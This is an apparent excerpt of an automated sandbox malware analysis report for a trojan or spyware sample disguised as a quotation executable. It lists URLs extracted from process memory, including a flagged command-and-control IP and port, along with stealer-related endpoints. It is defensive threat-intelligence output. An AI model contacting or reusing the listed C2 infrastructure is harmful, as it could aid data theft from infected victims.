                                      https://support.google.com/chrome/?p=plugin_javavbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://tempuri.org/Endpoint/VerifyUpdateResponsevbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://go.microsvbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://ns.adobe.c/g_vbc.exe, 00000017.00000003.448091472.000000000CDA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://tempuri.org/Endpoint/SetEnvironmentvbc.exe, 00000017.00000002.484781328.000000000740E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/Endpoint/SetEnvironmentResponsevbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/Endpoint/GetUpdatesvbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484560508.000000000734A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://support.google.com/chrome/?p=plugin_realvbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://api.ipify.orgcookies//settinString.RemovegQUOTATION062022.exe, 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmptrue
                                          • URL Reputation: safe
                                          unknown
                                          http://185.222.58.90:17910vbc.exe, 00000004.00000002.379436483.0000000007421000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2004/08/addressing/faultvbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.interoperabilitybridges.com/wmp-extension-for-chromevbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://support.google.com/chrome/?p=plugin_pdfvbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://duckduckgo.com/chrome_newtab1vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://support.google.com/chrome/?p=plugin_divxvbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Slvbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://tempuri.org/Endpoint/VerifyUpdatevbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://tempuri.org/0vbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://forms.real.com/real/realone/download.html?type=rpsp_usvbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://support.avbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://ipinfo.io/ip%appdata%vbc.exe, vbc.exe, 00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          high
                                                          http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exevbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://support.google.com/chrome/?p=plugin_quicktimevbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icovbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.drfalse
                                                                high
                                                                http://ns.adobe.cobjvbc.exe, 00000017.00000003.482504430.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482460655.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482616325.000000000CDB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousvbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://tempuri.org/Endpoint/CheckConnectResponsevbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://schemas.datacontract.org/2004/07/vbc.exe, 00000004.00000002.379532591.00000000074CE000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484781328.000000000740E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://api.ip.sb/geoip%USERPEnvironmentROFILE%QUOTATION062022.exe, 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Data.exe, 0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://helpx.advbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.drfalse
                                                                    high
                                                                    http://tempuri.org/Endpoint/CheckConnectvbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchvbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.drfalse
                                                                      high
                                                                      http://tempuri.org/Endpoint/SetEnvironvbc.exe, 00000004.00000002.380198845.000000000777B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484781328.000000000740E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://get.adobvbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://ac.ecosia.org/autocomplete?q=vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.drfalse
                                                                        high
                                                                        http://185.222.58.90:1vbc.exe, 00000004.00000002.380198845.000000000777B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484781328.000000000740E000.00000004.00000800.00020000.00000000.sdmptrue
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        http://service.real.com/realplayer/security/02062012_player/en/vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressingvbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://support.google.com/chrome/?p=plugin_shockwavevbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://ns.ado/1_vbc.exe, 00000017.00000003.448091472.000000000CDA1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://forms.reavbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485163870.0000000007574000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://tempuri.org/Endpoint/GetUpdatesResponsevbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://185.222.58.90:179104vbc.exe, 00000017.00000002.484659526.0000000007361000.00000004.00000800.00020000.00000000.sdmptrue
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://tempuri.org/Endpoint/EnvironmentSettingsResponsevbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.drfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/soap/actor/nextvbc.exe, 00000004.00000002.379277225.0000000007391000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.484436876.00000000072D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://ns.ado/1vbc.exe, 00000017.00000003.482504430.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482460655.000000000CDB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.482616325.000000000CDB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=vbc.exe, 00000004.00000002.380404351.00000000077E3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.380668992.000000000787C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.348177158.000000000A99B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485764334.00000000076A4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485565961.000000000760B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486063160.00000000077D6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.486180508.0000000007870000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.485937535.000000000773D000.00000004.00000800.00020000.00000000.sdmp, tmp98B9.tmp.4.dr, tmpC472.tmp.4.dr, tmp5452.tmp.23.dr, tmpD9D7.tmp.23.dr, tmp69EB.tmp.4.dr, tmpC64C.tmp.23.dr, tmpD369.tmp.23.dr, tmp151F.tmp.23.dr, tmp22C0.tmp.23.dr, tmp1759.tmp.4.dr, tmpBA00.tmp.4.dr, tmpA820.tmp.23.dr, tmp53EE.tmp.4.drfalse
                                                                                    high
                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs
                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    185.222.58.90
                                                                                    unknownNetherlands
                                                                                    51447ROOTLAYERNETNLfalse
                                                                                    IP
                                                                                    192.168.2.1
                                                                                    Joe Sandbox Version:35.0.0 Citrine
                                                                                    Analysis ID:648537
                                                                                    Start date and time: 20/06/202205:27:072022-06-20 05:27:07 +02:00
                                                                                    Joe Sandbox Product:CloudBasic
                                                                                    Overall analysis duration:0h 11m 11s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Sample file name:QUOTATION062022.exe
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                    Number of analysed new started processes analysed:43
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • HDC enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.evad.winEXE@24/53@4/2
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    HDC Information:
                                                                                    • Successful, ratio: 1.6% (good quality ratio 1.5%)
                                                                                    • Quality average: 67.1%
                                                                                    • Quality standard deviation: 19.1%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 97%
                                                                                    • Number of executed functions: 113
                                                                                    • Number of non-executed functions: 1
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Adjust boot time
                                                                                    • Enable AMSI
                                                                                    • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172
                                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, go.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    TimeTypeDescription
